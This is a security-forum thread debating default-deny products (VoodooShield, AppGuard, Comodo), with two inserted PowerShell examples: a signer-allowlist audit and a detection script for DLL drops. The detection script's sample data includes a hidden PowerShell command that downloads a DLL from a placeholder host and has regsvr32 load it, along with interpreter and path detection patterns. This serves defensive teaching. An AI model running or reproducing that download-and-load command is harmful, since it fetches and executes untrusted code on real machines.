Which default/deny solution wins, and why?

shmu26

Level 85
Thread author
Verified
Honorary Member
Top Poster
Content Creator
Well-known
Jul 3, 2015
8,153
Please state why you made your choice. There is a bit of mystery surrounding some of these apps; let's put it on the table for all to see. Facts, not fables.

I deliberately left AppGuard off the list because it is in a class all by itself.
 

Rengar

Level 17
Verified
Top Poster
Well-known
Jan 6, 2017
835
Google it, or go to their respective forums; don't wait for people to do it for you...
ANSWER: What's the reason to google it when you have the forum here? By your logic, any problem or question we have, we could google and find the solution rather than ask here. If you don't want to answer something then don't, but don't be harsh :p
 

jerzy601

Level 21
Verified
Top Poster
Well-known
Jun 20, 2011
1,005
My vote goes to VoodooShield: it is really good, lightweight and relatively simple to operate. I am pleased with its work; it cooperates very well with already installed antivirus products.
I currently have VoodooShield + ESET Internet Security, and they work together very well.
AppGuard is also a very good program; I used it some time ago and was happy with it, but I wanted to try VS and so I left it. At some point I'll go back to AppGuard, and then you don't need an antivirus.
 

shmu26

Comodo is a HIPS + isolation using kernel hooks; what other inner working knowledge do you need?
1. What does the HIPS do when you have it disabled? Comodo experts say it still functions in the background, but don't give details. This is an important issue for those following the famous CS non-HIPS config.
2. What protections does the HIPS provide for trusted processes? This is relevant to the loading of rogue DLLs and to memory exploits.
 

cruelsister

Level 43
Verified
Honorary Member
Top Poster
Content Creator
Well-known
Apr 13, 2013
3,224
Wow! Three of the best applications have been named as the favorites!

1). VS is a really clever program, and I love the fact that whenever it is confused (like with a true zero-day or if network connection is lost) it will suggest running it in isolation. This function really is genius!

2). AppGuard- (God forbid if I badmouthed it with Umbra around)- this program, especially in Lockdown mode makes it difficult, if not impossible, to become infected UNLESS the user allows something that shouldn't be allowed. But I suppose that would be true with anything.

3). CF- Of course the best of the lot. Although CF often has been accused of being a "Geek Only" security application, one of these days (soon) I will provide a setup that even a Man can use without taxing their little brains.

U- I thought you already had a million...


Deleted member 178

1. What does the HIPS do when you have it disabled? Comodo experts say it still functions in the background, but don't give details. This is an important issue for those following the famous CS non-HIPS config.
2. What protections does the HIPS provide for trusted processes? This is relevant to the loading of rogue DLLs and to memory exploits.

1. The HIPS is never disabled; it is in quiet mode and kicks in when the BB/sandbox does nothing. Read my thread: Comodo Internet Security's auto-Sandbox (BB) & HIPS interaction explanation
2. My other thread: Comodo's Myths & Facts

Note that almost all info about Comodo is available here, even more detailed and neutral than in the Comodo forum :p
 

Deleted member 178

Wow! Three of the best applications have been named as the favorites!

1). VS is a really clever program, and I love the fact that whenever it is confused (like with a true zero-day or if network connection is lost) it will suggest running it in isolation. This function really is genius!
I always forget this Cuckoo thingy :D

2). AppGuard- (God forbid if I badmouthed it with Umbra around)- this program, especially in Lockdown mode makes it difficult, if not impossible, to become infected UNLESS the user allows something that shouldn't be allowed. But I suppose that would be true with anything.
Indeed, be careful or a sexist comment will fall like the hammer of Thor :p

3). CF- Of course the best of the lot. Although CF often has been accused of being a "Geek Only" security application, one of these days (soon) I will provide a setup that even a Man can use without taxing their little brains.
I think many of us use it :D

U- I thought you already had a million...
Not yet, I try to restrict myself to common human standards :D
 

Sr. Normal 2.0

VS here! :) This Man is more comfortable with VS than with CF ;)

No, seriously, I do not like to trust the security of my computer to a single program; that's why I have VS, to support/complement my firewall (ZoneAlarm or Norton).

Of the list, it is the one I have used for the longest time. I also used Comodo Firewall in the past, but although I recognize its quality, I do not like it.
 

cruelsister

Umbra on the parallel thread brought up an excellent point about Trusted Vendors. AppGuard has about 8 (someone refresh my memory if that number is not accurate- but I know it is close) whereas Comodo has about 8000 (I KNOW that number is wrong, but it is lots and lots). Although an extensive Trusted Vendor list is a potential issue for malware using a false certificate, this list can be customized in Comodo to make it identical to that of AppGuard (of course I have a video for that).

Shmu- regarding how CF handles DLLs: dropping and registering malicious DLLs is a popular attack vector, especially for RATs. With Comodo at my settings the drop will be recognized and the DLL will be isolated from the rest of the system. With either a sandbox reset or a system reboot it will be wiped out. As within the next month I'll be publishing a CF for Babies video, I'll be sure to include malware of this type to demonstrate.

And screw the HIPS, btw...
 
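As an added example (not from cruelsister's post, and not code from AppGuard, Comodo or VoodooShield), here is a PowerShell audit that applies a deliberately short trusted-vendor list, in the AppGuard spirit, to the executables in a folder using the Authenticode signatures Windows can verify. The two names in $TrustedVendors are an assumed sample allowlist, not any product's real list, and `Test-TrustedVendor` / `Get-SignerCN` are names chosen for this example.

```powershell
# Added example, not code from the thread or from AppGuard/Comodo/VoodooShield.
# Emulates a short "trusted vendor" allowlist over real Authenticode data.
# $TrustedVendors is an ASSUMED sample list of signer CNs, not any product's real list.
$TrustedVendors = @(
    'Microsoft Windows',
    'Microsoft Corporation'
)

function Get-SignerCN {
    # Pull the CN out of an X.500 subject; CNs are quoted when they contain commas.
    param([Parameter(Mandatory)][string]$Subject)
    if ($Subject -match 'CN=(?:"([^"]*)"|([^,]+))') {
        if ($Matches[1]) { return $Matches[1] }
        return $Matches[2].Trim()
    }
    return $null
}

function Test-TrustedVendor {
    param(
        [Parameter(Mandatory)][string]$Path,
        [string[]]$Allowlist = $TrustedVendors
    )
    $sig = Get-AuthenticodeSignature -FilePath $Path
    # Default-deny: only a signature whose chain validates counts. 'NotSigned',
    # 'HashMismatch' (file altered after signing) and 'UnknownError' (untrusted
    # root) all fail, regardless of what name the certificate carries.
    if ($sig.Status -ne 'Valid') {
        return [pscustomobject]@{ Path = $Path; Status = $sig.Status; Signer = $null; Trusted = $false }
    }
    $cn = Get-SignerCN -Subject $sig.SignerCertificate.Subject
    [pscustomobject]@{
        Path    = $Path
        Status  = $sig.Status
        Signer  = $cn
        # "Validly signed" and "trusted vendor" are different questions: a good
        # signature from a vendor that is not on the list is still denied.
        Trusted = ($Allowlist -contains $cn)
    }
}

# Usage: list everything in System32 that the tiny allowlist would NOT auto-trust.
Get-ChildItem -Path "$env:SystemRoot\System32\*.exe" |
    ForEach-Object { Test-TrustedVendor -Path $_.FullName } |
    Where-Object { -not $_.Trusted } |
    Format-Table Path, Status, Signer -AutoSize
```

Two caveats a practitioner would want. First, the check only proves that whoever signed the file held a private key chaining to a trusted root; a stolen or fraudulently issued certificate for a vendor on the list passes it, which is exactly why the length of the list matters. Second, the sample list is far too narrow for a real machine (every third-party signed tool would be denied), and older PowerShell versions do not consult catalog signatures, so OS files may show as NotSigned there.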

shmu26

Shmu- regarding how CF handles DLLs: dropping and registering malicious DLLs is a popular attack vector, especially for RATs. With Comodo at my settings the drop will be recognized and the DLL will be isolated from the rest of the system.
Hi there CS, in your videos, where you run a malware file on your desktop, the DLLs will be isolated because a sandboxed process is spawning them.
But the scenario we were discussing is where an app is exploited and a native script interpreter is used to download the DLL. That's trickier to block.
 
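An added example (not from shmu26's post, and not code from Comodo, AppGuard or VoodooShield) of what a detection for that chain looks like: it runs over a handful of constructed Sysmon-style records (ProcessCreate, event ID 1; ImageLoad, ID 7; FileCreate, ID 11) and flags a DLL that a script interpreter wrote into a user-writable location and that some process then loaded. The records, the user name, the URL and the file names are invented for the example, and `Find-DroppedDllLoads` is a name chosen here.

```powershell
# Added example, not code from the thread or from Comodo/AppGuard/VoodooShield.
# Correlates Sysmon-style FileCreate (ID 11) and ImageLoad (ID 7) records:
# a script interpreter drops a DLL somewhere user-writable, then something loads it.

# Constructed sample records (field names follow Sysmon; the values are invented).
$PS = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
$Events = @(
    [pscustomobject]@{ Id = 11; Time = '2017-02-01T10:00:01'; Image = 'C:\Program Files\Acme\reader.exe';
                       TargetFilename = 'C:\Program Files\Acme\cache\page.bin' }
    [pscustomobject]@{ Id = 1;  Time = '2017-02-01T10:00:02'; Image = $PS;
                       ParentImage = 'C:\Program Files\Acme\reader.exe';
                       CommandLine = 'powershell -nop -w hidden -c "iwr http://example.invalid/u.dll -OutFile $env:APPDATA\u.dll"' }
    [pscustomobject]@{ Id = 11; Time = '2017-02-01T10:00:04'; Image = $PS;
                       TargetFilename = 'C:\Users\alice\AppData\Roaming\u.dll' }
    [pscustomobject]@{ Id = 7;  Time = '2017-02-01T10:00:05'; Image = 'C:\Windows\System32\regsvr32.exe';
                       ImageLoaded = 'C:\Users\alice\AppData\Roaming\u.dll'; Signed = 'false' }
    [pscustomobject]@{ Id = 7;  Time = '2017-02-01T10:00:06'; Image = 'C:\Windows\System32\notepad.exe';
                       ImageLoaded = 'C:\Windows\System32\kernel32.dll'; Signed = 'true' }
)

function Find-DroppedDllLoads {
    param([Parameter(Mandatory)][object[]]$Events)

    # Interpreters an exploited app is likely to hand off to ("living off the land").
    $Interpreters = 'powershell.exe', 'wscript.exe', 'cscript.exe', 'mshta.exe', 'cmd.exe'
    # Places a standard user can write to; a DLL should not normally be born here.
    $UserWritable = '^[A-Z]:\\(Users\\[^\\]+\\AppData\\|Users\\Public\\|ProgramData\\|Windows\\Temp\\)'

    $parents = @{}   # lower-cased image path -> its parent image (keyed by path for
    $drops   = @{}   # brevity; real Sysmon data should be keyed by ProcessGuid)
    foreach ($e in ($Events | Sort-Object Time)) {
        switch ($e.Id) {
            1 { $parents[$e.Image.ToLower()] = $e.ParentImage }
            11 {
                $writer = Split-Path -Leaf $e.Image
                if ($e.TargetFilename -match '\.dll$' -and
                    $e.TargetFilename -match $UserWritable -and
                    $writer -in $Interpreters) {
                    $drops[$e.TargetFilename.ToLower()] = $e.Image
                }
            }
            7 {
                $key = $e.ImageLoaded.ToLower()
                if ($drops.ContainsKey($key)) {
                    # The chain the thread describes: interpreter downloads/writes the DLL,
                    # then a (signed, otherwise trusted) process such as regsvr32 loads it.
                    [pscustomobject]@{
                        Time       = $e.Time
                        Loader     = $e.Image
                        Dll        = $e.ImageLoaded
                        DroppedBy  = $drops[$key]
                        ViaParent  = $parents[$drops[$key].ToLower()]
                        DllSigned  = $e.Signed
                    }
                }
            }
        }
    }
}

# Usage: exactly one hit is expected, regsvr32.exe loading the powershell-dropped u.dll,
# with reader.exe (the exploited app) shown as the interpreter's parent.
Find-DroppedDllLoads -Events $Events | Format-Table -AutoSize
```

The point of the correlation is the case cruelsister's desktop demo does not cover: the process that writes the DLL is a signed, vendor-trusted interpreter, so no sandbox ever wrapped it, and the only observable that remains is "DLL created in a user-writable path by an interpreter, then loaded". A default-deny product blocks at the load step; this script only alerts after the fact, which is why it belongs beside, not instead of, such a product.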

Deleted member 178

Hi there CS, in your videos, where you run a malware file on your desktop, the DLLs will be isolated because a sandboxed process is spawning them.
But the scenario we were discussing is where an app is exploited and a native script interpreter is used to download the DLL. That's trickier to block.
Use the HIPS :p (CS will kill me lol)
 

shmu26

Use the HIPS :p (CS will kill me lol)
Tried to do that yesterday, but CFW trashed my browser. It would not let Chrome load my profile. I installed CFW, right away put it in proactive mode, and boom, Chrome was broken.
30 hours later, and 0 replies on the Comodo help forum.
Any ideas what to do?
 

SHvFl

Level 35
Verified
Honorary Member
Top Poster
Content Creator
Well-known
Nov 19, 2014
2,350
Tried to do that yesterday, but CFW trashed my browser. It would not let Chrome load my profile. I installed CFW, right away put it in proactive mode, and boom, Chrome was broken.
30 hours later, and 0 replies on the Comodo help forum.
Any ideas what to do?
Stop using Comodo products because the support is terrible every single time?
 

Wave

isolation using kernel hooks
Since they work with real virtualization (e.g. you will need virtualization to be enabled in the BIOS; the hardware must support the virtualization functionality which processor manufacturers integrate, such as Intel VT-x and AMD SVM), they do not need to worry about PatchGuard; they'll be able to use kernel-mode patching techniques such as MSR hooks. Kaspersky also uses real virtualization; they implement features like screenshot protection through use of the hypervisor... It also allows them to prevent a GDI+ exploit in win32k.sys, which other vendors cannot do.
 
